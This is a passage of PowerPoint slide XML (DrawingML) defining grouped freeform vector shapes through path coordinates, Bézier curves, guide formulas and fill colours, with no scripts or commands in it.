                    <a:gd name="T11" fmla="*/ 44 h 65"/>
                    <a:gd name="T12" fmla="*/ 81 w 242"/>
                    <a:gd name="T13" fmla="*/ 44 h 65"/>
                    <a:gd name="T14" fmla="*/ 161 w 242"/>
                    <a:gd name="T15" fmla="*/ 65 h 65"/>
                    <a:gd name="T16" fmla="*/ 242 w 242"/>
                    <a:gd name="T17" fmla="*/ 43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2" h="65">
                      <a:moveTo>
                        <a:pt x="242" y="43"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="22"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="81" y="44"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="161" y="65"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="43"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="8E47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02" name="Group 842">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDDBF3A0-EDB1-4276-97B2-544DDFAED3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16" y="1833"/>
                <a:ext cx="90" cy="70"/>
                <a:chOff x="2155" y="1811"/>
                <a:chExt cx="675" cy="523"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2209" name="Freeform 843">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CCBF8DF-3527-4DB1-965C-C3A855C4D9F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90" y="1818"/>
                  <a:ext cx="314" cy="433"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4460"/>
                    <a:gd name="T1" fmla="*/ 0 h 6160"/>
                    <a:gd name="T2" fmla="*/ 0 w 4460"/>
                    <a:gd name="T3" fmla="*/ 4972 h 6160"/>
                    <a:gd name="T4" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T5" fmla="*/ 6160 h 6160"/>
                    <a:gd name="T6" fmla="*/ 4460 w 4460"/>
                    <a:gd name="T7" fmla="*/ 1188 h 6160"/>
                    <a:gd name="T8" fmla="*/ 0 w 4460"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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60" h="6160">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="6160"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4460" y="11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10" name="Freeform 844">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B823963C-819B-45BB-B695-7442AE48264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3" y="1850"/>
                  <a:ext cx="268" cy="332"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 3803"/>
                    <a:gd name="T1" fmla="*/ 0 h 4725"/>
                    <a:gd name="T2" fmla="*/ 0 w 3803"/>
                    <a:gd name="T3" fmla="*/ 3711 h 4725"/>
                    <a:gd name="T4" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T5" fmla="*/ 4725 h 4725"/>
                    <a:gd name="T6" fmla="*/ 3803 w 3803"/>
                    <a:gd name="T7" fmla="*/ 1014 h 4725"/>
                    <a:gd name="T8" fmla="*/ 0 w 3803"/>
                    <a:gd name="T9" fmla="*/ 0 h 47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03" h="4725">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="3711"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="4725"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3803" y="10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11" name="Freeform 845">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60169BF2-8E1E-49CE-853E-430DC49C80C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90" y="1811"/>
                  <a:ext cx="340" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T1" fmla="*/ 1189 h 1288"/>
                    <a:gd name="T2" fmla="*/ 4460 w 4831"/>
                    <a:gd name="T3" fmla="*/ 1288 h 1288"/>
                    <a:gd name="T4" fmla="*/ 0 w 4831"/>
                    <a:gd name="T5" fmla="*/ 100 h 1288"/>
                    <a:gd name="T6" fmla="*/ 368 w 4831"/>
                    <a:gd name="T7" fmla="*/ 0 h 1288"/>
                    <a:gd name="T8" fmla="*/ 4831 w 4831"/>
                    <a:gd name="T9" fmla="*/ 1189 h 1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31" h="1288">
                      <a:moveTo>
                        <a:pt x="4831" y="1189"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4460" y="1288"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="100"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4831" y="1189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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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12" name="Freeform 846">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7192F320-F8B3-4092-B393-264DFE47523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155" y="2127"/>
                  <a:ext cx="675" cy="181"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 9603"/>
                    <a:gd name="T1" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T2" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T3" fmla="*/ 0 h 2577"/>
                    <a:gd name="T4" fmla="*/ 9603 w 9603"/>
                    <a:gd name="T5" fmla="*/ 1287 h 2577"/>
                    <a:gd name="T6" fmla="*/ 4802 w 9603"/>
                    <a:gd name="T7" fmla="*/ 2577 h 2577"/>
                    <a:gd name="T8" fmla="*/ 0 w 9603"/>
                    <a:gd name="T9" fmla="*/ 1287 h 25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603" h="2577">
                      <a:moveTo>
                        <a:pt x="0" y="1287"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4802" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9603" y="1287"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="2577"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1287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13" name="Freeform 847">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBF2B410-A253-4D8B-9986-DC0721E2919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93" y="2218"/>
                  <a:ext cx="337" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 4801"/>
                    <a:gd name="T1" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4801"/>
                    <a:gd name="T3" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T4" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T5" fmla="*/ 369 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4801 w 4801"/>
                    <a:gd name="T7" fmla="*/ 0 h 1656"/>
                    <a:gd name="T8" fmla="*/ 0 w 4801"/>
                    <a:gd name="T9" fmla="*/ 1290 h 16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01" h="1656">
                      <a:moveTo>
                        <a:pt x="0" y="1290"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="1656"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4801" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="129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14" name="Freeform 848">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EDBDD5A-325A-4B4D-97F9-22B360A2490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155" y="2218"/>
                  <a:ext cx="338" cy="116"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T1" fmla="*/ 1656 h 1656"/>
                    <a:gd name="T2" fmla="*/ 0 w 4802"/>
                    <a:gd name="T3" fmla="*/ 369 h 1656"/>
                    <a:gd name="T4" fmla="*/ 0 w 4802"/>
                    <a:gd name="T5" fmla="*/ 0 h 1656"/>
                    <a:gd name="T6" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T7" fmla="*/ 1290 h 1656"/>
                    <a:gd name="T8" fmla="*/ 4802 w 4802"/>
                    <a:gd name="T9" fmla="*/ 1656 h 16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02" h="1656">
                      <a:moveTo>
                        <a:pt x="4802" y="1656"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="369"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="1290"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4802" y="165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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="B2B2B2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15" name="Freeform 849">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6984A1-C506-4CF9-BC62-63FDBC224EB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51" y="2157"/>
                  <a:ext cx="457" cy="122"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 6492"/>
                    <a:gd name="T1" fmla="*/ 654 h 1743"/>
                    <a:gd name="T2" fmla="*/ 4061 w 6492"/>
                    <a:gd name="T3" fmla="*/ 1743 h 1743"/>
                    <a:gd name="T4" fmla="*/ 6492 w 6492"/>
                    <a:gd name="T5" fmla="*/ 1091 h 1743"/>
                    <a:gd name="T6" fmla="*/ 2431 w 6492"/>
                    <a:gd name="T7" fmla="*/ 0 h 1743"/>
                    <a:gd name="T8" fmla="*/ 0 w 6492"/>
                    <a:gd name="T9" fmla="*/ 654 h 1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92" h="1743">
                      <a:moveTo>
                        <a:pt x="0" y="654"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4061" y="1743"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6492" y="1091"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2431" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="654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16" name="Freeform 850">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A1040C3-8553-43AE-B177-C1C2BE9DB5E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04" y="1894"/>
                  <a:ext cx="26" cy="357"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 371"/>
                    <a:gd name="T1" fmla="*/ 5071 h 5071"/>
                    <a:gd name="T2" fmla="*/ 371 w 371"/>
                    <a:gd name="T3" fmla="*/ 4972 h 5071"/>
                    <a:gd name="T4" fmla="*/ 371 w 371"/>
                    <a:gd name="T5" fmla="*/ 0 h 5071"/>
                    <a:gd name="T6" fmla="*/ 0 w 371"/>
                    <a:gd name="T7" fmla="*/ 99 h 5071"/>
                    <a:gd name="T8" fmla="*/ 0 w 371"/>
                    <a:gd name="T9" fmla="*/ 5071 h 50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1" h="5071">
                      <a:moveTo>
                        <a:pt x="0" y="5071"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="371" y="4972"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="99"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5071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03" name="Group 851">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A411EF1C-DCDD-463E-B427-95CDC3A020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60" y="1819"/>
                <a:ext cx="110" cy="171"/>
                <a:chOff x="2158" y="1204"/>
                <a:chExt cx="419" cy="647"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2204" name="Freeform 852">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BA26B23-3130-4B17-8F80-B88D57D9449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94" y="1592"/>
                  <a:ext cx="177" cy="231"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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72549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05" name="Freeform 853">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D7353DC-D01D-41CA-8F26-11613B69B65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25" y="1575"/>
                  <a:ext cx="326" cy="276"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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72549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06" name="Freeform 854">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AA45E64-AE9D-43E2-B2DA-FA9FE4B1075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158" y="1323"/>
                  <a:ext cx="419" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
